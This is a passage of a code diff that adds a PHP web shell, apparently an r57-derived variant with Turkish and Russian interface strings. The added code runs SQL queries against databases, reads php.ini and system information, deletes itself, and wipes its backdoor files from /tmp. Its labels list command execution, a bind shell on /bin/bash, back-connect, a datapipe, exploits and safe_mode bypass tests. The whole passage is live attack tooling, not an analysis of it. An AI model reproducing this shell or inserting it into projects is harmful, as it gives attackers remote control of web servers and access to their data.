+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" SQL Sorgusu Iste \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+   die();
+ }
+/*
+&#1042;&#1099;&#1073;&#1086;&#1088; &#1103;&#1079;&#1099;&#1082;&#1072;
+$language='eng' - &#1088;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081;
+$language='ru' - &#1072;&#1085;&#1075;&#1083;&#1080;&#1081;&#1089;&#1082;&#1080;&#1081;
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1085;&#1072;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text2' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+'ru_text3' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1091;',
+'ru_text4' =>'&#1056;&#1072;&#1073;&#1086;&#1095;&#1072;&#1103; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103;',
+'ru_text5' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;',
+'ru_text6' =>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text7' =>'&#1040;&#1083;&#1080;&#1072;&#1089;&#1099;',
+'ru_text8' =>'&#1042;&#1099;&#1073;&#1077;&#1088;&#1080;&#1090;&#1077; &#1072;&#1083;&#1080;&#1072;&#1089;',
+'ru_butt1' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;',
+'ru_butt2' =>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1080;&#1090;&#1100;',
+'ru_text9' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1080;&#1077; &#1087;&#1086;&#1088;&#1090;&#1072; &#1080; &#1087;&#1088;&#1080;&#1074;&#1103;&#1079;&#1082;&#1072; &#1077;&#1075;&#1086; &#1082; /bin/bash',
+'ru_text10'=>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100; &#1087;&#1086;&#1088;&#1090;',
+'ru_text11'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072;',
+'ru_butt3' =>'&#1054;&#1090;&#1082;&#1088;&#1099;&#1090;&#1100;',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-&#1072;&#1076;&#1088;&#1077;&#1089;',
+'ru_text14'=>'&#1055;&#1086;&#1088;&#1090;',
+'ru_butt4' =>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1080;&#1090;&#1100;',
+'ru_text15'=>'&#1047;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1072; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1089; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1086;&#1075;&#1086; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;',
+'ru_text16'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text17'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text18'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083;',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text21'=>'&#1053;&#1086;&#1074;&#1086;&#1077; &#1080;&#1084;&#1103;',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'&#1051;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;',
+'ru_text24'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1093;&#1086;&#1089;&#1090;',
+'ru_text25'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090;',
+'ru_text26'=>'&#1048;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_butt5' =>'&#1047;&#1072;&#1087;&#1091;&#1089;&#1090;&#1080;&#1090;&#1100;',
+'ru_text28'=>'&#1056;&#1072;&#1073;&#1086;&#1090;&#1072; &#1074; safe_mode',
+'ru_text29'=>'&#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1079;&#1072;&#1087;&#1088;&#1077;&#1097;&#1077;&#1085;',
+'ru_butt6' =>'&#1057;&#1084;&#1077;&#1085;&#1080;&#1090;&#1100;',
+'ru_text30'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1092;&#1072;&#1081;&#1083;&#1072;',
+'ru_butt7' =>'&#1042;&#1099;&#1074;&#1077;&#1089;&#1090;&#1080;',
+'ru_text31'=>'&#1060;&#1072;&#1081;&#1083; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;',
+'ru_text32'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; PHP &#1082;&#1086;&#1076;&#1072;',
+'ru_text33'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; open_basedir &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1080; cURL',
+'ru_butt8' =>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1080;&#1090;&#1100;',
+'ru_text34'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1091;&#1085;&#1082;&#1094;&#1080;&#1102; include',
+'ru_text35'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1079;&#1072;&#1075;&#1088;&#1091;&#1079;&#1082;&#1091; &#1092;&#1072;&#1081;&#1083;&#1072; &#1074; mysql',
+'ru_text36'=>'&#1041;&#1072;&#1079;&#1072;',
+'ru_text37'=>'&#1051;&#1086;&#1075;&#1080;&#1085;',
+'ru_text38'=>'&#1055;&#1072;&#1088;&#1086;&#1083;&#1100;',
+'ru_text39'=>'&#1058;&#1072;&#1073;&#1083;&#1080;&#1094;&#1072;',
+'ru_text40'=>'&#1044;&#1072;&#1084;&#1087; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_butt9' =>'&#1044;&#1072;&#1084;&#1087;',
+'ru_text41'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1077;',
+'ru_text42'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072;',
+'ru_text43'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083;',
+'ru_butt10'=>'&#1057;&#1086;&#1093;&#1088;&#1072;&#1085;&#1080;&#1090;&#1100;',
+'ru_butt11'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100;',
+'ru_text44'=>'&#1056;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1092;&#1072;&#1081;&#1083;&#1072; &#1085;&#1077;&#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;! &#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1076;&#1083;&#1103; &#1095;&#1090;&#1077;&#1085;&#1080;&#1103;!',
+'ru_text45'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1093;&#1088;&#1072;&#1085;&#1077;&#1085;',
+'ru_text46'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; phpinfo()',
+'ru_text47'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1085;&#1072;&#1089;&#1090;&#1088;&#1086;&#1077;&#1082; php.ini',
+'ru_text48'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1074;&#1088;&#1077;&#1084;&#1077;&#1085;&#1085;&#1099;&#1093; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074;',
+'ru_text49'=>'&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1072; &#1089; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;',
+'ru_text50'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089;&#1086;&#1088;&#1077;',
+'ru_text51'=>'&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1103; &#1086; &#1087;&#1072;&#1084;&#1103;&#1090;&#1080;',
+'ru_text52'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;',
+'ru_text53'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;',
+'ru_text54'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_butt12'=>'&#1053;&#1072;&#1081;&#1090;&#1080;',
+'ru_text55'=>'&#1058;&#1086;&#1083;&#1100;&#1082;&#1086; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_text56'=>'&#1053;&#1080;&#1095;&#1077;&#1075;&#1086; &#1085;&#1077; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;&#1086;',
+'ru_text57'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100; &#1060;&#1072;&#1081;&#1083;/&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;',
+'ru_text58'=>'&#1048;&#1084;&#1103;',
+'ru_text59'=>'&#1060;&#1072;&#1081;&#1083;',
+'ru_text60'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102;',
+'ru_butt13'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;/&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;',
+'ru_text61'=>'&#1060;&#1072;&#1081;&#1083; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;',
+'ru_text62'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;&#1072;',
+'ru_text63'=>'&#1060;&#1072;&#1081;&#1083; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;',
+'ru_text64'=>'&#1044;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1072;',
+'ru_text65'=>'&#1057;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100;',
+'ru_text66'=>'&#1059;&#1076;&#1072;&#1083;&#1080;&#1090;&#1100;',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'&#1050;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;',
+'ru_text69'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;1',
+'ru_text70'=>'&#1055;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;2',
+'ru_text71'=>"&#1042;&#1090;&#1086;&#1088;&#1086;&#1081; &#1087;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;:\r\n- &#1076;&#1083;&#1103; CHOWN - &#1080;&#1084;&#1103; &#1085;&#1086;&#1074;&#1086;&#1075;&#1086; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; &#1080;&#1083;&#1080; &#1077;&#1075;&#1086; UID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHGRP - &#1080;&#1084;&#1103; &#1075;&#1088;&#1091;&#1087;&#1087;&#1099; &#1080;&#1083;&#1080; GID (&#1095;&#1080;&#1089;&#1083;&#1086;&#1084;) \r\n- &#1076;&#1083;&#1103; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; CHMOD - &#1094;&#1077;&#1083;&#1086;&#1077; &#1095;&#1080;&#1089;&#1083;&#1086; &#1074; &#1074;&#1086;&#1089;&#1100;&#1084;&#1077;&#1088;&#1080;&#1095;&#1085;&#1086;&#1084; &#1087;&#1088;&#1077;&#1076;&#1089;&#1090;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1080; (&#1085;&#1072;&#1087;&#1088;&#1080;&#1084;&#1077;&#1088; 0777)",
+'ru_text72'=>'&#1058;&#1077;&#1082;&#1089;&#1090; &#1076;&#1083;&#1103; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;',
+'ru_text73'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1087;&#1072;&#1087;&#1082;&#1077;',
+'ru_text74'=>'&#1048;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093;',
+'ru_text75'=>'* &#1084;&#1086;&#1078;&#1085;&#1086; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100; &#1088;&#1077;&#1075;&#1091;&#1083;&#1103;&#1088;&#1085;&#1086;&#1077; &#1074;&#1099;&#1088;&#1072;&#1078;&#1077;&#1085;&#1080;&#1077;',
+'ru_text76'=>'&#1055;&#1086;&#1080;&#1089;&#1082; &#1090;&#1077;&#1082;&#1089;&#1090;&#1072; &#1074; &#1092;&#1072;&#1081;&#1083;&#1072;&#1093; &#1089; &#1087;&#1086;&#1084;&#1086;&#1097;&#1100;&#1102; &#1091;&#1090;&#1080;&#1083;&#1080;&#1090;&#1099; find',
+'ru_text77'=>'&#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1089;&#1090;&#1088;&#1091;&#1082;&#1090;&#1091;&#1088;&#1099; &#1073;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_text78'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1090;&#1072;&#1073;&#1083;&#1080;&#1094;&#1099;',
+'ru_text79'=>'&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1089;&#1090;&#1086;&#1083;&#1073;&#1094;&#1099;',
+'ru_text80'=>'&#1058;&#1080;&#1087;',
+'ru_text81'=>'&#1057;&#1077;&#1090;&#1100;',
+'ru_text82'=>'&#1041;&#1072;&#1079;&#1099; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;',
+'ru_text83'=>'&#1042;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072;',
+'ru_text84'=>'SQL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;',
+'ru_text85'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1074; MSSQL &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Komut Uygula',
+'eng_text2' =>'Server uzerinde komut calistir',
+'eng_text3' =>'Komut istemi',
+'eng_text4' =>'Calisma dizini',
+'eng_text5' =>'Servere Dosya Upload et',
+'eng_text6' =>'Yerel Dosya',
+'eng_text7' =>'Dizin Veya Dosya Bul',
+'eng_text8' =>'Sec',
+'eng_butt1' =>'Uygula',
+'eng_butt2' =>'Yukle',
+'eng_text9' =>'Porta baglan /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Sifre Giris',
+'eng_butt3' =>'Baglan',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Baglan',
+'eng_text15'=>'Uzaktan servere dosya yukle',
+'eng_text16'=>'ile',
+'eng_text17'=>'Uzak Dosya',
+'eng_text18'=>'Yerel Dosya',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Kullan',
+'eng_text21'=>'&nbsp;Yeni ad',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Yerel port',
+'eng_text24'=>'Uzak host',
+'eng_text25'=>'Uzak port',
+'eng_text26'=>'Kullan',
+'eng_butt5' =>'Iste',
+'eng_text28'=>'Guvenlik Modunda Calis',
+'eng_text29'=>'Giris Yasak',
+'eng_butt6' =>'Degistir',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Goster',
+'eng_text31'=>'Dosya Bulunamadi',
+'eng_text32'=>'PHP kod degerlendir',
+'eng_text33'=>'cUcurlL fonksiyonu ile open_basedir atlamayi test et.',
+'eng_butt8' =>'Testet',
+'eng_text34'=>'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.',
+'eng_text35'=>'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.',
+'eng_text36'=>'Database[VeriTabani]',
+'eng_text37'=>'Kullanici',
+'eng_text38'=>'Sifre',
+'eng_text39'=>'Tablo',
+'eng_text40'=>'Dump database table[DB Tablosu dok]',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'DB dosyalarini kaydet.[Dump filed]',
+'eng_text42'=>'Dosya Duzenle',
+'eng_text43'=>'Dosya Duzenlemek icin',
+'eng_butt10'=>'Kaydet',
+'eng_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor',
+'eng_text45'=>'Dosya Kaydedildi',
+'eng_text46'=>'PHPinfo Goster',
+'eng_text47'=>'php.ini dosyasinda ki degiskenleri goster',
+'eng_text48'=>'Temp dosylarini sil',
+'eng_butt11'=>'Dosya Duzenle',
+'eng_text49'=>'Server dan bu scripti sil',
+'eng_text50'=>'CPU bilgisini incele',
+'eng_text51'=>'Memory[hafiza] bilgisini incele]',
+'eng_text52'=>'Metin Bul',
+'eng_text53'=>'Dizin icinde',
+'eng_text54'=>'Dosyalarda ki metni bul',
+'eng_butt12'=>'Bul',
+'eng_text55'=>'Sadece dosyalarda ki',
+'eng_text56'=>'Bulunmadi :( KeyCoder :)',
+'eng_text57'=>'Olustur/Sil Dosya/Dizin',
+'eng_text58'=>'isim',
+'eng_text59'=>'dosya',
+'eng_text60'=>'dizin',
+'eng_butt13'=>'Olustur/Sil',
+'eng_text61'=>'Dosya Olustur',
+'eng_text62'=>'Dizin Olustur',
+'eng_text63'=>'Dosya Sil',
+'eng_text64'=>'Dizin Sil',
+'eng_text65'=>'Olustur',
+'eng_text66'=>'Sil',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Uygula',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Metin Bul',
+'eng_text73'=>'Klasor Bul',
+'eng_text74'=>'Dosya Bul',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Metin ara dosyalarin icinde arama yoluyla',
+'eng_text77'=>'Database yapisini Goster',
+'eng_text78'=>'Tablolari Goster',
+'eng_text79'=>'Sutunlari Goster',
+'eng_text80'=>'Cesit',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'SQL sorgusu yap',
+'eng_text84'=>'SQL sorgusu',
+);
+/*
+&#1040;&#1083;&#1080;&#1072;&#1089;&#1099; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;
+&#1055;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1090; &#1080;&#1079;&#1073;&#1077;&#1078;&#1072;&#1090;&#1100; &#1084;&#1085;&#1086;&#1075;&#1086;&#1082;&#1088;&#1072;&#1090;&#1085;&#1086;&#1075;&#1086; &#1085;&#1072;&#1073;&#1086;&#1088;&#1072; &#1086;&#1076;&#1085;&#1080;&#1093; &#1080; &#1090;&#1077;&#1093;-&#1078;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;. ( &#1057;&#1076;&#1077;&#1083;&#1072;&#1085;&#1086; &#1073;&#1083;&#1072;&#1075;&#1086;&#1076;&#1072;&#1088;&#1103; &#1084;&#1086;&#1077;&#1081; &#1087;&#1088;&#1080;&#1088;&#1086;&#1076;&#1085;&#1086;&#1081; &#1083;&#1077;&#1085;&#1080; )
